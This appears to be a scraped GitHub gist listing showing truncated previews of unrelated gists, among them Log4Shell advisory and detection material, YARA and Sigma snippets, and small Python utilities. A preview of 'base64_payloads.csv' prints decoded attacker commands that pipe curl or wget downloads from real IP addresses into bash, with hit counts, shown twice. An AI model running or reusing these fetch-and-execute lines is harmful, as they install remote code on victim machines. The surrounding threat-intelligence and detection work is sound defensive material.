Adam Swanda deadbits

## airoboros-gpt4-2.0.md

      
              3 files
            
          
              2 forks
            
          
              0 comments
            
          
              10 stars
            
          
                jondurbin
                / airoboros-gpt4-2.0.md
            
            
              Last active
              November 2, 2023 06:30
            
          
    Details on how the airoboros-gpt4-2.0 dataset was created.

Script

https://github.com/jondurbin/airoboros
pip install --upgrade airoboros==2.0.13

  
## blog.md

      
              4 files
            
          
              12 forks
            
          
              5 comments
            
          
              171 stars
            
          
                Hellisotherpeople
                / blog.md
            
            
              Last active
              May 4, 2024 01:57
            
              
                You probably don't know how to do Prompt Engineering, let me educate you. 
              
          
    You probably don't know how to do Prompt Engineering

(This post could also be titled "Features missing from most LLM front-ends that should exist")

Apologies for the snarky title, but there has been a huge amount of discussion around so called "Prompt Engineering" these past few months on all kinds of platforms. Much of it is coming from individuals who are peddling around an awful lot of "Prompting" and very little "Engineering".
Most of these discussions are little more than users finding that writing more creative and complicated prompts can help them solve a task that a more simple prompt was unable to help with. I claim this is not Prompt Engineering. This is not to say that crafting good prompts is not a difficult task, but it does not involve doing any kind of sophisticated modifications to general "template" of a prompt.
Others, who I think do deserve to call themselves "Prompt Engineers" (and an awful lot more than that), have been writing about and utilizing the rich new eco-system

  
## 20211210-TLP-WHITE_LOG4J.md

      
              1 file
            
          
              94 forks
            
          
              767 comments
            
          
              1090 stars
            
          
                SwitHak
                / 20211210-TLP-WHITE_LOG4J.md
            
            
              Last active
              May 6, 2024 10:09
            
              
                BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC
              
          
    Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
Errors, typos, something to say ?


If you want to add a link, comment or send it to me
Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources


Royce Williams list sorted by vendors responses Royce List
Very detailed list NCSC-NL
The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List


## base64_payloads.csv

          
            b64decoded
            hits

            
              (curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash
              2056

            
              (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
              162

            
              (curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash
              2

## log4j_rce_detection.md

      
              1 file
            
          
              72 forks
            
          
              70 comments
            
          
              512 stars
            
          
                Neo23x0
                / log4j_rce_detection.md
            
            
              Last active
              January 28, 2024 08:19
            
              
                Log4j RCE CVE-2021-44228 Exploitation Detection
              
          
    log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

  
## snippet_gen_yara_hash.py
import hashlib
import re

def calculate_rule_hash(rule):
    """
    Calculates a hash over the relevant YARA rule content (string contents, sorted condition)
    Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara
    :param rule: yara rule object
    :return hash: generated hash
    """

## gen_godmode_rule.yml
# ################################################################################
# IMPORTANT NOTE
# The most recent version of this POC rule can now be found in the main repository
# https://github.com/Neo23x0/sigma/blob/master/other/godmode_sigma_rule.yml
# ################################################################################
#    _____        __  __  ___        __
#   / ___/__  ___/ / /  |/  /__  ___/ /__
#  / (_ / _ \/ _  / / /|_/ / _ \/ _  / -_)
#  \___/\___/\_,_/ /_/  /_/\___/\_,_/\__/_
#    / __(_)__ ___ _  ___ _  / _ \__ __/ /__

## processify.py
import os
import sys
import traceback
from functools import wraps
from multiprocessing import Process, Queue


def processify(func):
    '''Decorator to run a function as a process.
    Be sure that every argument and the return value

## gist:2069206
export PS1="\[\033[34m\]\w\[\033[35m\]\`ruby -e \"print (%x{git branch 2> /dev/null}.split(/\n/).grep(/^\*/).first || '').gsub(/^\* (.+)$/, '(\1)')\"\`\[\033[00m\]> "

## get_lat_lon_exif_pil.py
from PIL import Image
from PIL.ExifTags import TAGS, GPSTAGS

def get_exif_data(image):
    """Returns a dictionary from the exif data of an PIL Image item. Also converts the GPS Tags"""
    exif_data = {}
    info = image._getexif()
    if info:
        for tag, value in info.items():
            decoded = TAGS.get(tag, tag)
	b64decoded	hits
	(curl -s 45.155.205.233:5874/<IP_ADDRESS>\|\|wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)\|bash	2056
	(curl -s 80.71.158.12/lh.sh\|\|wget -q -O- 80.71.158.12/lh.sh)\|bash	162
	(curl -s 80.71.158.44/lh.sh\|\|wget -q -O- 80.71.158.44/lh.sh)\|bash	2
	import hashlib
	import re

	def calculate_rule_hash(rule):
	"""
	Calculates a hash over the relevant YARA rule content (string contents, sorted condition)
	Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara
	:param rule: yara rule object
	:return hash: generated hash
	"""
	# ################################################################################
	# IMPORTANT NOTE
	# The most recent version of this POC rule can now be found in the main repository
	# https://github.com/Neo23x0/sigma/blob/master/other/godmode_sigma_rule.yml
	# ################################################################################
	# _____ __ __ ___ __
	# / ___/__ ___/ / / \|/ /__ ___/ /__
	# / (_ / _ \/ _ / / /\|_/ / _ \/ _ / -_)
	# \___/\___/\_,_/ /_/ /_/\___/\_,_/\__/_
	# / __(_)__ ___ _ ___ _ / _ \__ __/ /__
	import os
	import sys
	import traceback
	from functools import wraps
	from multiprocessing import Process, Queue


	def processify(func):
	'''Decorator to run a function as a process.
	Be sure that every argument and the return value
	from PIL import Image
	from PIL.ExifTags import TAGS, GPSTAGS

	def get_exif_data(image):
	"""Returns a dictionary from the exif data of an PIL Image item. Also converts the GPS Tags"""
	exif_data = {}
	info = image._getexif()
	if info:
	for tag, value in info.items():
	decoded = TAGS.get(tag, tag)